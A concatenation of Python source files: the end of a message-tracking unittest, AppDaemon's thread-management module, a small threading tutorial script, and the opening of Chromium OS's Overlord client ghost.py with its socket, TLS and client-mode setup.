self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Accepted')
self.assertIsNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.retrieve_message(msg_id).read()
self.assertIsNotNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.acknowledge_message(msg_id)
self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Acknowledged')
def test_msg_id_tracking(self):
alice = self.alice
bob = self.bob
msg_id = alice.send_message(self.bob_mailbox, b'Hello World')
self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Accepted')
self.assertIsNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.retrieve_message(msg_id).read()
self.assertIsNotNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.acknowledge_message(msg_id)
self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Acknowledged')
if __name__ == "__main__":
main()
|
threading.py
|
import asyncio
import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
import iso8601
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
def __init__(self, ad: AppDaemon, kwargs):
self.AD = ad
self.kwargs = kwargs
self.logger = ad.logging.get_child("_threading")
self.diag = ad.logging.get_diag()
self.thread_count = 0
self.threads = {}
# A few shortcuts
self.add_entity = ad.state.add_entity
self.get_state = ad.state.get_state
self.set_state = ad.state.set_state
self.add_to_state = ad.state.add_to_state
self.add_to_attr = ad.state.add_to_attr
self.auto_pin = True
self.pin_threads = 0
self.total_threads = 0
self.pin_apps = None
self.next_thread = None
# Setup stats
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
self.callback_list = []
async def get_q_update(self):
for thread in self.threads:
qsize = self.get_q(thread).qsize()
await self.set_state("_threading", "admin", "thread.{}".format(thread), q=qsize)
async def get_callback_update(self):
now = datetime.datetime.now()
self.callback_list.append(
{"fired": self.current_callbacks_fired, "executed": self.current_callbacks_executed, "ts": now}
)
if len(self.callback_list) > 10:
self.callback_list.pop(0)
fired_sum = 0
executed_sum = 0
for item in self.callback_list:
fired_sum += item["fired"]
executed_sum += item["executed"]
total_duration = (
self.callback_list[len(self.callback_list) - 1]["ts"] - self.callback_list[0]["ts"]
).total_seconds()
if total_duration == 0:
fired_avg = 0
executed_avg = 0
else:
fired_avg = round(fired_sum / total_duration, 1)
executed_avg = round(executed_sum / total_duration, 1)
await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
await self.set_state(
"_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg,
)
self.last_stats_time = now
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
async def init_admin_stats(self):
# Initialize admin stats
await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
await self.add_entity("admin", "sensor.threads_current_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy", 0)
await self.add_entity(
"admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
)
await self.add_entity(
"admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
)
async def create_initial_threads(self):
kwargs = self.kwargs
if "threads" in kwargs:
self.logger.warning(
"Threads directive is deprecated apps - will be pinned. Use total_threads if you want to unpin your apps"
)
if "total_threads" in kwargs:
self.total_threads = kwargs["total_threads"]
self.auto_pin = False
else:
apps = await self.AD.app_management.check_config(True, False)
self.total_threads = int(apps["active"])
self.pin_apps = True
utils.process_arg(self, "pin_apps", kwargs)
if self.pin_apps is True:
self.pin_threads = self.total_threads
else:
self.auto_pin = False
self.pin_threads = 0
if "total_threads" not in kwargs:
self.total_threads = 10
utils.process_arg(self, "pin_threads", kwargs, int=True)
if self.pin_threads > self.total_threads:
raise ValueError("pin_threads cannot be > total_threads")
if self.pin_threads < 0:
raise ValueError("pin_threads cannot be < 0")
self.logger.info(
"Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads,
)
self.next_thread = self.pin_threads
self.thread_count = 0
for i in range(self.total_threads):
await self.add_thread(True)
# Add thread object to track async
await self.add_entity(
"admin",
"thread.async",
"idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
"pinned_apps": [],
},
)
def get_q(self, thread_id):
return self.threads[thread_id]["queue"]
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
return [self.atoi(c) for c in re.split(r"(\d+)", text)]
# Diagnostics
def total_q_size(self):
qsize = 0
for thread in self.threads:
qsize += self.threads[thread]["queue"].qsize()
return qsize
def min_q_id(self):
id = 0
i = 0
qsize = sys.maxsize
for thread in self.threads:
if self.threads[thread]["queue"].qsize() < qsize:
qsize = self.threads[thread]["queue"].qsize()
id = i
i += 1
return id
async def get_thread_info(self):
info = {}
info["max_busy_time"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy_time")
info["last_action_time"] = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
info["current_busy"] = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
info["max_busy"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
info["threads"] = {}
for thread in sorted(self.threads, key=self.natural_keys):
if thread not in info["threads"]:
info["threads"][thread] = {}
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
info["threads"][thread]["time_called"] = t["attributes"]["time_called"]
info["threads"][thread]["callback"] = t["state"]
info["threads"][thread]["is_alive"] = t["attributes"]["is_alive"]
return info
async def dump_threads(self):
self.diag.info("--------------------------------------------------")
self.diag.info("Threads")
self.diag.info("--------------------------------------------------")
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
self.diag.info("Currently busy threads: %s", current_busy)
self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
self.diag.info("Last activity: %s", last_action_time)
self.diag.info("Total Q Entries: %s", self.total_q_size())
self.diag.info("--------------------------------------------------")
for thread in sorted(self.threads, key=self.natural_keys):
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
print("thread.{}".format(thread), t)
self.diag.info(
"%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
thread,
t["attributes"]["q"],
t["state"],
t["attributes"]["time_called"],
t["attributes"]["is_alive"],
await self.get_pinned_apps(thread),
)
self.diag.info("--------------------------------------------------")
#
# Thread Management
#
def select_q(self, args):
#
# Select Q based on distribution method:
# Round Robin
# Random
# Load distribution
#
# Check for pinned app and if so figure correct thread for app
if args["pin_app"] is True:
thread = args["pin_thread"]
# Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
# If this happens a lot, thread 0 might get congested but the alternatives are worse!
if thread == -1:
self.logger.warning(
"Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"],
)
thread = 0
else:
if self.thread_count == self.pin_threads:
raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
if self.AD.load_distribution == "load":
thread = self.min_q_id()
elif self.AD.load_distribution == "random":
thread = randint(self.pin_threads, self.thread_count - 1)
else:
# Round Robin is the catch all
thread = self.next_thread
self.next_thread += 1
if self.next_thread == self.thread_count:
self.next_thread = self.pin_threads
if thread < 0 or thread >= self.thread_count:
raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
id = "thread-{}".format(thread)
q = self.threads[id]["queue"]
q.put_nowait(args)
async def check_overdue_and_dead_threads(self):
if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
for thread_id in self.threads:
if self.threads[thread_id]["thread"].is_alive() is not True:
self.logger.critical("Thread %s has died", thread_id)
self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
self.logger.critical("Thread will be restarted")
id = thread_id.split("-")[1]
await self.add_thread(silent=False, pinthread=False, id=id)
if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
start = utils.str_to_dt(
await self.get_state(
"_threading", "admin", "thread.{}".format(thread_id), attribute="time_called",
)
)
dur = (await self.AD.sched.get_now() - start).total_seconds()
if (
dur >= self.AD.thread_duration_warning_threshold
and dur % self.AD.thread_duration_warning_threshold == 0
):
self.logger.warning(
"Excessive time spent in callback: %s - %s",
await self.get_state(
"_threading", "admin", "thread.{}".format(thread_id), attribute="callback",
),
dur,
)
async def check_q_size(self, warning_step, warning_iterations):
totalqsize = 0
for thread in self.threads:
totalqsize += self.threads[thread]["queue"].qsize()
if totalqsize > self.AD.qsize_warning_threshold:
if (
warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations
) or warning_iterations == self.AD.qsize_warning_iterations:
for thread in self.threads:
qsize = self.threads[thread]["queue"].qsize()
if qsize > 0:
self.logger.warning(
"Queue size for thread %s is %s, callback is '%s' called at %s - possible thread starvation",
thread,
qsize,
await self.get_state("_threading", "admin", "thread.{}".format(thread)),
iso8601.parse_date(
await self.get_state(
"_threading", "admin", "thread.{}".format(thread), attribute="time_called",
)
),
)
await self.dump_threads()
warning_step = 0
warning_step += 1
warning_iterations += 1
if warning_step >= self.AD.qsize_warning_step:
warning_step = 0
else:
warning_step = 0
warning_iterations = 0
return warning_step, warning_iterations
async def update_thread_info(self, thread_id, callback, app, type, uuid):
self.logger.debug("Update thread info: %s", thread_id)
if self.AD.log_thread_actions:
if callback == "idle":
self.diag.info("%s done", thread_id)
else:
self.diag.info("%s calling %s callback %s", thread_id, type, callback)
now = await self.AD.sched.get_now()
if callback == "idle":
start = utils.str_to_dt(
await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called",)
)
if (
self.AD.sched.realtime is True
and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold
):
self.logger.warning(
"callback %s has now completed",
await self.get_state("_threading", "admin", "thread.{}".format(thread_id)),
)
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
await self.add_to_attr(
"_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1,
)
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
self.current_callbacks_executed += 1
else:
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
self.current_callbacks_fired += 1
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
if current_busy > max_busy:
await self.set_state("_threading", "admin", "sensor.threads_max_busy", state=current_busy)
await self.set_state(
"_threading",
"admin",
"sensor.threads_max_busy_time",
state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz),
)
await self.set_state(
"_threading",
"admin",
"sensor.threads_last_action_time",
state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz),
)
# Update thread info
if thread_id == "async":
await self.set_state(
"_threading",
"admin",
"thread.{}".format(thread_id),
q=0,
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=True,
pinned_apps=[],
)
else:
await self.set_state(
"_threading",
"admin",
"thread.{}".format(thread_id),
q=self.threads[thread_id]["queue"].qsize(),
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=self.threads[thread_id]["thread"].is_alive(),
pinned_apps=await self.get_pinned_apps(thread_id),
)
await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)
#
# Pinning
#
async def add_thread(self, silent=False, pinthread=False, id=None):
if id is None:
tid = self.thread_count
else:
tid = id
if silent is False:
self.logger.info("Adding thread %s", tid)
t = threading.Thread(target=self.worker)
t.daemon = True
name = "thread-{}".format(tid)
t.setName(name)
if id is None:
await self.add_entity(
"admin",
"thread.{}".format(name),
"idle",
{"q": 0, "is_alive": True, "time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0))},
)
self.threads[name] = {}
self.threads[name]["queue"] = Queue(maxsize=0)
t.start()
self.thread_count += 1
if pinthread is True:
self.pin_threads += 1
else:
await self.set_state(
"_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True,
)
self.threads[name]["thread"] = t
async def calculate_pin_threads(self):
if self.pin_threads == 0:
return
thread_pins = [0] * self.pin_threads
for name in self.AD.app_management.objects:
# Looking for apps that already have a thread pin value
if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
thread = await self.get_pin_thread(name)
if thread >= self.thread_count:
raise ValueError(
"Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'"
)
# Ignore anything outside the pin range as it will have been set by the user
if thread < self.pin_threads:
thread_pins[thread] += 1
# Now we know the numbers, go fill in the gaps
for name in self.AD.app_management.objects:
if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
thread = thread_pins.index(min(thread_pins))
await self.set_pin_thread(name, thread)
thread_pins[thread] += 1
for thread in self.threads:
pinned_apps = await self.get_pinned_apps(thread)
await self.set_state(
"_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps,
)
def app_should_be_pinned(self, name):
# Check apps.yaml first - allow override
app = self.AD.app_management.app_config[name]
if "pin_app" in app:
return app["pin_app"]
# if not, go with the global default
return self.pin_apps
async def get_app_pin(self, name):
return self.AD.app_management.objects[name]["pin_app"]
async def set_app_pin(self, name, pin):
self.AD.app_management.objects[name]["pin_app"] = pin
if pin is True:
# May need to set this app up with a pinned thread
await self.calculate_pin_threads()
async def get_pin_thread(self, name):
return self.AD.app_management.objects[name]["pin_thread"]
async def set_pin_thread(self, name, thread):
self.AD.app_management.objects[name]["pin_thread"] = thread
def validate_pin(self, name, kwargs):
valid = True
if "pin_thread" in kwargs:
if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
self.logger.warning(
"Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name,
)
valid = False
return valid
async def get_pinned_apps(self, thread):
id = int(thread.split("-")[1])
apps = []
for obj in self.AD.app_management.objects:
if self.AD.app_management.objects[obj]["pin_thread"] == id:
apps.append(obj)
return apps
#
# Constraints
#
async def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = await utils.run_in_executor(self, method, value)
return unconstrained
async def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
unconstrained = False
return unconstrained
async def check_days_constraint(self, args, name):
unconstrained = True
if "constrain_days" in args:
days = args["constrain_days"]
now = await self.AD.sched.get_now()
daylist = []
for day in days.split(","):
daylist.append(await utils.run_in_executor(self, utils.day_of_week, day))
if now.weekday() not in daylist:
unconstrained = False
return unconstrained
#
# Workers
#
async def check_and_dispatch_state(
self, name, funcref, entity, attribute, new_state, old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread,
):
executed = False
# kwargs["handle"] = uuid_
#
#
#
if attribute == "all":
executed = await self.dispatch_worker(
name,
{
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
},
)
else:
#
# Let's figure out if we need to run a callback
#
# Start by figuring out what the incoming old value was
#
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif "attributes" in old_state and attribute in old_state["attributes"]:
old = old_state["attributes"][attribute]
else:
old = None
#
# Now the incoming new value
#
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif "attributes" in new_state and attribute in new_state["attributes"]:
new = new_state["attributes"][attribute]
else:
new = None
#
# Don't do anything unless there has been a change
#
if new != old:
if "__duration" in kwargs:
#
# We have a pending timer for this, but we are coming around again.
# Either we will start a new timer if the conditions are met
# Or we won't if they are not.
# Either way, we cancel the old timer
#
await self.AD.sched.cancel_timer(name, kwargs["__duration"])
#
# Check if we care about the change
#
if (cold is None or cold == old) and (cnew is None or cnew == new):
#
# We do!
#
if "duration" in kwargs:
#
# Set a timer
#
exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
#
# If it's a oneshot, scheduler will delete the callback once it has executed,
# We need to give it the handle so it knows what to delete
#
if kwargs.get("oneshot", False):
kwargs["__handle"] = uuid_
#
# We're not executing the callback immediately so let's schedule it
# Unless we intercede and cancel it, the callback will happen in "duration" seconds
#
kwargs["__duration"] = await self.AD.sched.insert_schedule(
name,
exec_time,
funcref,
False,
None,
__entity=entity,
__attribute=attribute,
__old_state=old,
__new_state=new,
**kwargs
)
else:
#
# Not a delay so make the callback immediately
#
executed = await self.dispatch_worker(
name,
{
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
},
)
return executed
async def dispatch_worker(self, name, args):
unconstrained = True
#
# Argument Constraints
#
for arg in self.AD.app_management.app_config[name].keys():
constrained = await self.check_constraint(
arg, self.AD.app_management.app_config[name][arg], self.AD.app_management.objects[name]["object"],
)
if not constrained:
unconstrained = False
if not await self.check_time_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
elif not await self.check_days_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
myargs = utils.deepcopy(args)
if "kwargs" in myargs:
for arg in myargs["kwargs"].keys():
constrained = await self.check_constraint(
arg, myargs["kwargs"][arg], self.AD.app_management.objects[name]["object"],
)
if not constrained:
unconstrained = False
if not await self.check_time_constraint(myargs["kwargs"], name):
unconstrained = False
elif not await self.check_days_constraint(myargs["kwargs"], name):
unconstrained = False
if unconstrained:
#
# It's going to happen
#
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
await self.add_to_attr(
"_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1,
)
#
# And Q
#
if asyncio.iscoroutinefunction(myargs["function"]):
f = asyncio.ensure_future(self.async_worker(myargs))
self.AD.futures.add_future(name, f)
else:
self.select_q(myargs)
return True
else:
return False
# noinspection PyBroadException
async def async_worker(self, args):
thread_id = threading.current_thread().name
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = await self.AD.app_management.get_app_instance(name, objectid)
if app is not None:
try:
if _type == "scheduler":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(
entity,
attr,
old_state,
new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]),
)
except TypeError:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(
data["app_name"],
data["ts"],
data["level"],
data["log_type"],
data["message"],
args["kwargs"],
)
except TypeError:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(args["event"], data, args["kwargs"])
except TypeError:
self.report_callback_sig(name, "event", funcref, args)
except Exception:
error_logger.warning("-" * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning("-" * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning("-" * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning(
"Logged an error to %s", self.AD.logging.get_filename("error_log"),
)
finally:
pass
await self.update_thread_info("async", "idle", name, _type, _id)
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
# noinspection PyBroadException
def worker(self): # noqa: C901
thread_id = threading.current_thread().name
q = self.get_q(thread_id)
while True:
args = q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
if app is not None:
try:
if _type == "scheduler":
try:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(
entity,
attr,
old_state,
new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]),
)
except TypeError:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(
data["app_name"],
data["ts"],
data["level"],
data["log_type"],
data["message"],
args["kwargs"],
)
except TypeError:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(args["event"], data, args["kwargs"])
except TypeError:
self.report_callback_sig(name, "event", funcref, args)
except Exception:
error_logger.warning("-" * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning("-" * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning("-" * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning(
"Logged an error to %s", self.AD.logging.get_filename("error_log"),
)
finally:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, "idle", name, _type, _id),
)
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
q.task_done()
def report_callback_sig(self, name, type, funcref, args):
callback_args = {
"scheduler": {"count": 1, "signature": "f(self, kwargs)"},
"state": {"count": 5, "signature": "f(self, entity, attribute, old, new, kwargs)"},
"event": {"count": 3, "signature": "f(self, event, data, kwargs)"},
"log_event": {"count": 6, "signature": "f(self, name, ts, level, type, message, kwargs)"},
"initialize": {"count": 0, "signature": "initialize()"},
"terminate": {"count": 0, "signature": "terminate()"},
}
sig = inspect.signature(funcref)
if type in callback_args:
if len(sig.parameters) != callback_args[type]["count"]:
self.logger.warning(
"Suspect incorrect signature type for callback %s() in %s, should be %s - discarding",
funcref.__name__,
name,
callback_args[type]["signature"],
)
error_logger = logging.getLogger("Error.{}".format(name))
error_logger.warning("-" * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning("-" * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning("-" * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
else:
self.logger.error("Unknown callback type: %s", type)
|
definining_a_thread.py
|
import threading
def function(i):
print("function called by thread {}\n".format(i))
return
threads = []
for i in range(5):
# Instantiate a thread
t = threading.Thread(target=function, args=(i,))
threads.append(t)
# Start running thread
t.start()
# Makes the calling thread wait until the thread has finished the execution
t.join()
|
ghost.py
|
#!/usr/bin/env python3
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import binascii
import codecs
import contextlib
import ctypes
import ctypes.util
import fcntl
import hashlib
import json
import logging
import os
import platform
import queue
import re
import select
import signal
import socket
import ssl
import struct
import subprocess
import sys
import termios
import threading
import time
import traceback
import tty
import urllib.request
import uuid
import jsonrpclib
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
from cros.factory.gooftool import cros_config as cros_config_module
from cros.factory.test import device_data
from cros.factory.test import state
from cros.factory.test.state import TestState
from cros.factory.test.test_lists import manager
from cros.factory.utils import net_utils
from cros.factory.utils import process_utils
from cros.factory.utils import sys_interface
from cros.factory.utils import sys_utils
from cros.factory.utils.type_utils import Enum
_GHOST_RPC_PORT = int(os.getenv('GHOST_RPC_PORT', '4499'))
_OVERLORD_PORT = int(os.getenv('OVERLORD_PORT', '4455'))
_OVERLORD_LAN_DISCOVERY_PORT = int(os.getenv('OVERLORD_LD_PORT', '4456'))
_OVERLORD_HTTP_PORT = int(os.getenv('OVERLORD_HTTP_PORT', '9000'))
_BUFSIZE = 8192
_RETRY_INTERVAL = 2
_SEPARATOR = b'\r\n'
_PING_TIMEOUT = 3
_PING_INTERVAL = 5
_REQUEST_TIMEOUT_SECS = 60
_SHELL = os.getenv('SHELL', '/bin/bash')
_DEFAULT_BIND_ADDRESS = 'localhost'
_CONTROL_START = 128
_CONTROL_END = 129
_BLOCK_SIZE = 4096
_CONNECT_TIMEOUT = 3
# Stream control
_STDIN_CLOSED = '##STDIN_CLOSED##'
SUCCESS = 'success'
FAILED = 'failed'
DISCONNECTED = 'disconnected'
class PingTimeoutError(Exception):
pass
class RequestError(Exception):
pass
class BufferedSocket:
"""A buffered socket that supports unrecv.
Allow putting back data back to the socket for the next recv() call.
"""
def __init__(self, sock):
self.sock = sock
self._buf = b''
def fileno(self):
return self.sock.fileno()
def Recv(self, bufsize, flags=0):
if self._buf:
if len(self._buf) >= bufsize:
ret = self._buf[:bufsize]
self._buf = self._buf[bufsize:]
return ret
ret = self._buf
self._buf = b''
return ret + self.sock.recv(bufsize - len(ret), flags)
return self.sock.recv(bufsize, flags)
def UnRecv(self, buf):
self._buf = buf + self._buf
def Send(self, *args, **kwargs):
return self.sock.send(*args, **kwargs)
def RecvBuf(self):
"""Only recive from buffer."""
ret = self._buf
self._buf = b''
return ret
def Close(self):
self.sock.close()
class TLSSettings:
def __init__(self, tls_cert_file, verify):
"""Constructor.
Args:
tls_cert_file: TLS certificate in PEM format.
enable_tls_without_verify: enable TLS but don't verify certificate.
"""
self._enabled = False
self._tls_cert_file = tls_cert_file
self._verify = verify
self._tls_context = None
def _UpdateContext(self):
if not self._enabled:
self._tls_context = None
return
self._tls_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
self._tls_context.verify_mode = ssl.CERT_REQUIRED
if self._verify:
if self._tls_cert_file:
self._tls_context.check_hostname = True
try:
self._tls_context.load_verify_locations(self._tls_cert_file)
logging.info('TLSSettings: using user-supplied ca-certificate')
except IOError as e:
logging.error('TLSSettings: %s: %s', self._tls_cert_file, e)
sys.exit(1)
else:
self._tls_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
logging.info('TLSSettings: using built-in ca-certificates')
else:
self._tls_context.verify_mode = ssl.CERT_NONE
logging.info('TLSSettings: skipping TLS verification!!!')
def SetEnabled(self, enabled):
logging.info('TLSSettings: enabled: %s', enabled)
if self._enabled != enabled:
self._enabled = enabled
self._UpdateContext()
def Enabled(self):
return self._enabled
def Context(self):
return self._tls_context
class Ghost:
"""Ghost implements the client protocol of Overlord.
Ghost provide terminal/shell/logcat functionality and manages the client
side connectivity.
"""
NONE, AGENT, TERMINAL, SHELL, LOGCAT, FILE, FORWARD = range(7)
MODE_NAME = {
NONE: 'NONE',
AGENT: 'Agent',
TERMINAL: 'Terminal',
SHELL: 'Shell',
LOGCAT: 'Logcat',
FILE: 'File',
FORWARD: 'Forward'
}
RANDOM_MID = '##random_mid##'
def __init__(self, overlord_addrs, tls_settings=None, mode=AGENT, mid=None,
sid=None, prop_file=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None, tls_mode=None,
ovl_path=None, certificate_dir=None):
"""Constructor.
Args:
overlord_addrs: a list of possible address of overlord.
tls_settings: a TLSSetting object.
mode: client mode, either AGENT, SHELL or LOGCAT
mid: a str to set for machine ID. If mid equals Ghost.RANDOM_MID, machine
id is randomly generated.
sid: session ID. If the connection is requested by overlord, sid should
be set to the corresponding session id assigned by overlord.
prop_file: properties file filename.
terminal_sid: the terminal session ID associate with this client. This is
use for file download.
tty_device: the terminal device to open, if tty_device is None, as pseudo
terminal will be opened instead.
command: the command to execute when we are in SHELL mode.
file_op: a tuple (action, filepath, perm). action is either 'download' or
'upload'. perm is the permission to set for the file.
port: port number to forward.
tls_mode: can be [True, False, None]. if not None, skip detection of
TLS and assume whether server use TLS or not.
ovl_path: path to ovl tool.
certificate_dir: path to overlord certificate directory
"""
assert mode in [Ghost.AGENT, Ghost.TERMINAL, Ghost.SHELL, Ghost.FILE,
Ghost.FORWARD]
if mode == Ghost.SHELL:
assert command is not None
if mode == Ghost.FILE:
assert file_op is not None
self._platform = platform.system()
self._overlord_addrs = overlord_addrs
self._connected_addr = None
self._tls_settings = tls_settings
self._mid = mid
self._sock = None
